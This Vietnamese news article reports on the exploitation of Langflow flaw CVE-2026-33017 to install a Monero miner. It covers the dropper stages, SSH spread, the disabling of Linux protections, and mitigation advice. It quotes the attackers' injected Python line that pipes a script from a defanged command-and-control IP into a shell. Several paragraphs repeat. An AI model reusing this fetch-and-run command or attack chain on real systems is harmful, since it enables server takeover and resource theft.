-
09/04/2020
-
141
-
2.009 bài viết
Langflow bị khai thác cài mã độc đào tiền ảo chỉ sau chưa đầy 20 giờ công bố
Một lỗ hổng vừa được phát hiện trong nền tảng phát triển ứng dụng AI Langflow đang trở thành mục tiêu của các nhóm tấn công mạng nhằm chiếm quyền điều khiển máy chủ và âm thầm cài đặt mã độc đào tiền điện tử. Đáng chú ý, chỉ chưa đầy 20 giờ sau khi lỗ hổng được công khai, các chuyên gia đã ghi nhận hoạt động khai thác ngoài thực tế, cho thấy tốc độ "vũ khí hóa" của lỗ hổng diễn ra cực kỳ nhanh.
Theo nghiên cứu của Trend Micro TrendAI Research, chiến dịch này không chỉ cài đặt trình đào đồng tiền mã hóa Monero mà còn có khả năng lây lan sang các máy chủ khác thông qua khóa SSH, vô hiệu hóa hàng loạt cơ chế bảo vệ của hệ điều hành Linux và xóa dấu vết nhằm tránh bị phát hiện. Điều này khiến các máy chủ AI công khai trên Internet đứng trước nguy cơ bị kiểm soát hoàn toàn nếu chưa được cập nhật bản vá.
Lỗ hổng CVE-2026-33017 là gì?
Lỗ hổng được định danh CVE-2026-33017, có điểm CVSS v4.0 đạt 9,3/10, thuộc nhóm RCE không cần xác thực. Đây là một trong những loại lỗ hổng nguy hiểm nhất bởi kẻ tấn công không cần đăng nhập hay có tài khoản hợp lệ vẫn có thể thực thi mã lệnh tùy ý trên máy chủ từ xa.
Lỗ hổng ảnh hưởng tới mọi phiên bản Langflow trước 1.9.0.
Langflow là một nền tảng mã nguồn mở được nhiều tổ chức và nhà phát triển sử dụng để xây dựng các ứng dụng AI dựa trên mô hình ngôn ngữ lớn (LLM), kết nối các thành phần AI thông qua giao diện trực quan thay vì phải lập trình toàn bộ bằng mã nguồn. Do thường được triển khai trên các máy chủ có GPU hoặc hạ tầng điện toán đám mây, Langflow đang trở thành mục tiêu hấp dẫn đối với các nhóm tấn công mạng.
Lỗ hổng ảnh hưởng tới mọi phiên bản Langflow trước 1.9.0.
Langflow là một nền tảng mã nguồn mở được nhiều tổ chức và nhà phát triển sử dụng để xây dựng các ứng dụng AI dựa trên mô hình ngôn ngữ lớn (LLM), kết nối các thành phần AI thông qua giao diện trực quan thay vì phải lập trình toàn bộ bằng mã nguồn. Do thường được triển khai trên các máy chủ có GPU hoặc hạ tầng điện toán đám mây, Langflow đang trở thành mục tiêu hấp dẫn đối với các nhóm tấn công mạng.
Nguyên nhân khiến lỗ hổng xuất hiện
Theo Trend Micro, nguyên nhân nằm trong API:
POST /api/v1/build_public_tmp/{flow_id}/flow
API này cho phép người dùng gửi lên một trường dữ liệu tên code. Thay vì kiểm tra hoặc giới hạn nội dung, Langflow lại trực tiếp thực thi đoạn mã Python mà người dùng gửi lên ngay trong tiến trình của máy chủ.Tức là, máy chủ đã vô tình "tin tưởng" hoàn toàn dữ liệu do người dùng cung cấp.
Điều này đồng nghĩa với việc hacker chỉ cần gửi một đoạn mã Python độc hại là có thể yêu cầu máy chủ:
- Tải file từ Internet
- Thực thi lệnh Linux
- Tạo tài khoản mới
- Cài đặt mã độc
- Đánh cắp dữ liệu
- Hoặc kiểm soát toàn bộ hệ thống.
Mức độ nghiêm trọng còn tăng lên khi AUTO_LOGIN được bật mặc định trong Langflow. Cơ chế này tự động cấp quyền quản trị cho bất kỳ ai truy cập lần đầu mà không cần xác thực. Nhờ vậy, tin tặc có thể tạo một "public flow" mới rồi khai thác lỗ hổng ngay lập tức mà không cần bất kỳ thông tin đăng nhập nào.
Chỉ chưa đầy 20 giờ sau công bố đã xuất hiện khai thác ngoài thực tế
Theo Trend Micro TrendAI Research, các cuộc tấn công đầu tiên được ghi nhận chỉ khoảng 20 giờ sau khi thông tin lỗ hổng được công bố.
Đây là khoảng thời gian cực kỳ ngắn, cho thấy các nhóm tấn công đang liên tục theo dõi những lỗ hổng mới được công bố để nhanh chóng phát triển mã khai thác trước khi các tổ chức kịp vá lỗi.
Điều này cũng phản ánh xu hướng đáng lo ngại hiện nay khi khoảng cách giữa thời điểm công bố lỗ hổng và thời điểm bị khai thác ngày càng bị rút ngắn.
Đây là khoảng thời gian cực kỳ ngắn, cho thấy các nhóm tấn công đang liên tục theo dõi những lỗ hổng mới được công bố để nhanh chóng phát triển mã khai thác trước khi các tổ chức kịp vá lỗi.
Điều này cũng phản ánh xu hướng đáng lo ngại hiện nay khi khoảng cách giữa thời điểm công bố lỗ hổng và thời điểm bị khai thác ngày càng bị rút ngắn.
Đây không phải lần đầu Langflow gặp lỗi nghiêm trọng
Đáng chú ý, đây đã là lần thứ hai trong chưa đầy một năm Langflow xuất hiện lỗ hổng có bản chất tương tự.
Trước đó, CVE-2025-3248 cũng là một lỗ hổng thực thi mã từ xa không cần xác thực và từng bị botnet Flodrix khai thác vào tháng 6/2025 để triển khai các cuộc tấn công từ chối dịch vụ phân tán (DDoS).
Việc hai lỗ hổng nghiêm trọng cùng xuất hiện trong khoảng thời gian ngắn cho thấy các cơ chế xử lý dữ liệu đầu vào của Langflow từng tồn tại những vấn đề bảo mật đáng kể.
Trước đó, CVE-2025-3248 cũng là một lỗ hổng thực thi mã từ xa không cần xác thực và từng bị botnet Flodrix khai thác vào tháng 6/2025 để triển khai các cuộc tấn công từ chối dịch vụ phân tán (DDoS).
Việc hai lỗ hổng nghiêm trọng cùng xuất hiện trong khoảng thời gian ngắn cho thấy các cơ chế xử lý dữ liệu đầu vào của Langflow từng tồn tại những vấn đề bảo mật đáng kể.
Tin tặc khai thác lỗ hổng như thế nào?
Quá trình tấn công được các chuyên gia ghi nhận diễn ra theo nhiều bước liên tiếp. Đầu tiên, hacker gửi tới máy chủ Langflow một đoạn mã Python rất ngắn:
__import__('os').system('curl hxxp://83[.]142[.]209[.]214:8080/isp.sh | sh')
Đoạn mã này yêu cầu hệ điều hành tải về tập tin isp.sh từ máy chủ điều khiển của kẻ tấn công rồi thực thi ngay lập tức.
Chỉ với một dòng lệnh, toàn bộ quá trình lây nhiễm được kích hoạt.
Chỉ với một dòng lệnh, toàn bộ quá trình lây nhiễm được kích hoạt.
Giai đoạn 1: Cài đặt trình tải (Dropper)
Sau khi được tải xuống, isp.sh hoạt động như một "dropper" – chương trình có nhiệm vụ chuẩn bị môi trường để cài đặt mã độc chính.
Script này sẽ:
Script này sẽ:
- Tạo thư mục ẩn /var/tmp/.xlamb/
- Tải file thực thi lambsys.elf
- Khởi chạy mã độc dưới nền
- Thiết lập cơ chế tồn tại lâu dài trên hệ thống.
Điểm đáng chú ý là thư mục này được tạo ở vị trí ít được người quản trị chú ý, giúp kéo dài thời gian ẩn mình của mã độc.
Giai đoạn 2: Lây lan sang các máy chủ khác bằng SSH
Không dừng lại ở một máy chủ. Dropper còn kiểm tra:
- ~/.ssh/known_hosts
- SSH Agent
- Các khóa SSH đang được lưu.
Nếu phát hiện máy chủ có khả năng kết nối SSH tới các hệ thống khác, mã độc sẽ tự động sao chép chính nó sang các máy này thông qua SCP.
Điều nguy hiểm là việc lây lan này vẫn diễn ra ngay cả khi máy đích không có kết nối Internet trực tiếp. Nói cách khác, chỉ cần một máy chủ AI bị xâm nhập cũng có thể kéo theo hàng loạt máy chủ nội bộ khác bị kiểm soát.
Điều nguy hiểm là việc lây lan này vẫn diễn ra ngay cả khi máy đích không có kết nối Internet trực tiếp. Nói cách khác, chỉ cần một máy chủ AI bị xâm nhập cũng có thể kéo theo hàng loạt máy chủ nội bộ khác bị kiểm soát.
Giai đoạn 3: Triển khai mã độc chính "lambsys.elf"
Payload chính là "lambsys.elf", một chương trình viết bằng ngôn ngữ Go và được nén bằng UPX nhằm giảm kích thước cũng như gây khó khăn cho việc phân tích.
Theo Trend Micro, phiên bản xuất hiện trong chiến dịch năm 2026:
Theo Trend Micro, phiên bản xuất hiện trong chiến dịch năm 2026:
- Nhỏ hơn khoảng 48% so với bản đầu tiên năm 2024
- Tỷ lệ bị VirusTotal phát hiện giảm mạnh từ 31/66 xuống chỉ còn 4/66.
Điều này cho thấy tác giả mã độc đã liên tục cải tiến kỹ thuật nhằm né tránh các phần mềm chống virus.
Mã độc vô hiệu hóa hàng loạt cơ chế bảo vệ
Sau khi giành quyền kiểm soát máy chủ, lambsys.elf bắt đầu "dọn đường". Nó chủ động:
- Dừng 39 tiến trình đào tiền điện tử khác như Kinsing, WatchDog và Outlaw để độc chiếm tài nguyên;
- Chấm dứt các tiến trình đang sử dụng nhiều cổng khai thác tiền mã hóa phổ biến;
- Vô hiệu hóa AppArmor;
- Tắt SELinux;
- Vô hiệu hóa UFW;
- Xóa các quy tắc iptables;
- Tắt Kernel NMI Watchdog;
- Vô hiệu hóa phần mềm bảo mật Aliyun Security Agent trên hạ tầng Alibaba Cloud.
Chuỗi hành động này cho thấy nhóm tấn công có hiểu biết sâu về môi trường Linux và đặc biệt nhắm tới các máy chủ AI triển khai trên nền tảng đám mây.
Xóa dấu vết và thiết lập cơ chế tồn tại lâu dài
Sau khi cài đặt thành công, mã độc tiếp tục:
- Xóa file /var/log/syslog
- Thiết lập cron job chạy mỗi 5 phút
- Tạo watchdog script tên init_rmount chạy mỗi phút.
Nếu tiến trình bị người quản trị tắt, watchdog sẽ tự động khởi động lại. Điều này khiến việc loại bỏ mã độc trở nên khó khăn hơn rất nhiều.
Mục tiêu cuối cùng là đào tiền điện tử Monero
Sau khi hoàn tất quá trình chiếm quyền điều khiển, lambsys.elf tải về tập tin ks.tar. Bên trong là phiên bản tùy chỉnh của XMRig, phần mềm đào đồng tiền điện tử Monero (XMR).
Để tránh bị chú ý, chương trình:
Để tránh bị chú ý, chương trình:
- Kết nối tới mining pool qua TCP/3333;
- Giả mạo User-Agent thành SystemMonitor/6.25.0 nhằm trông giống lưu lượng hợp pháp;
- Truy vấn dịch vụ ipinfo.io để xác định vị trí địa lý của nạn nhân.
Nếu phát hiện máy chủ thuộc khu vực mà nhóm vận hành đang sinh sống, mã độc sẽ không tiếp tục hoạt động nhằm giảm nguy cơ bị cơ quan thực thi pháp luật trong nước phát hiện.
Vì sao chiến dịch này đặc biệt nguy hiểm?
Khác với nhiều chiến dịch đào tiền điện tử thông thường, chiến dịch lần này không chỉ tận dụng tài nguyên hệ thống. Nó còn:
- Chiếm quyền điều khiển máy chủ;
- Đánh cắp hoặc tái sử dụng khóa SSH;
- Mở rộng lây nhiễm trong toàn bộ hạ tầng;
- Vô hiệu hóa các lớp bảo vệ;
- Xóa dấu vết điều tra;
- Duy trì khả năng truy cập lâu dài.
Điều này khiến một sự cố ban đầu nhanh chóng phát triển thành nguy cơ xâm nhập toàn bộ hệ thống. Các chuyên gia nhấn mạnh rằng nếu phát hiện dấu vết của lambsys, tổ chức cần coi đây là sự cố lộ khóa SSH trên diện rộng, thay vì chỉ là một máy chủ bị cài mã độc.
Phạm vi ảnh hưởng
Theo Trend Micro, nhóm tấn công đã được theo dõi liên tục trong khoảng thời gian 19 ngày, từ 27/3 đến 15/4/2026. Chiến dịch chủ yếu nhắm tới các máy chủ Langflow được công khai trên Internet.
Do Langflow được sử dụng rộng rãi trong các dự án AI, đặc biệt trên các máy chủ GPU và môi trường điện toán đám mây, số lượng hệ thống có nguy cơ bị ảnh hưởng có thể rất lớn nếu chưa được cập nhật bản vá.
Ngoài ra, máy chủ điều khiển 83[.]142[.]209[.]214 đã xuất hiện trong danh sách chặn Spamhaus DROP. Điều này đồng nghĩa với việc những tổ chức áp dụng danh sách chặn này tại tường lửa có thể tự động ngăn toàn bộ lưu lượng kết nối đến máy chủ điều khiển của chiến dịch.
Do Langflow được sử dụng rộng rãi trong các dự án AI, đặc biệt trên các máy chủ GPU và môi trường điện toán đám mây, số lượng hệ thống có nguy cơ bị ảnh hưởng có thể rất lớn nếu chưa được cập nhật bản vá.
Ngoài ra, máy chủ điều khiển 83[.]142[.]209[.]214 đã xuất hiện trong danh sách chặn Spamhaus DROP. Điều này đồng nghĩa với việc những tổ chức áp dụng danh sách chặn này tại tường lửa có thể tự động ngăn toàn bộ lưu lượng kết nối đến máy chủ điều khiển của chiến dịch.
Các tổ chức cần làm gì để phòng tránh?
Các chuyên gia an ninh mạng khuyến nghị các đơn vị đang sử dụng Langflow cần triển khai các biện pháp sau càng sớm càng tốt:
- Cập nhật Langflow lên phiên bản 1.9.0 hoặc mới hơn để vá lỗ hổng CVE-2026-33017.
- Không công khai máy chủ Langflow trực tiếp ra Internet nếu không thực sự cần thiết.
- Tắt cơ chế AUTO_LOGIN bằng cách đặt AUTO_LOGIN=false.
- Kiểm tra xem dịch vụ Langflow có đang chạy với quyền quản trị (root) hay không và giảm quyền nếu có thể.
- Rà soát sự xuất hiện của các tệp, thư mục và tiến trình đáng ngờ như /var/tmp/.xlamb/, lambsys.elf, procq hoặc init_rmount.
- Nếu phát hiện dấu hiệu lây nhiễm, cần coi toàn bộ khóa SSH trên hệ thống đã có nguy cơ bị lộ, tiến hành thay thế toàn bộ khóa, đổi thông tin xác thực liên quan và kiểm tra khả năng lây lan sang các máy chủ khác.
- Theo dõi các kết nối bất thường tới máy chủ điều khiển hoặc các cổng đào tiền điện tử để phát hiện sớm hoạt động độc hại.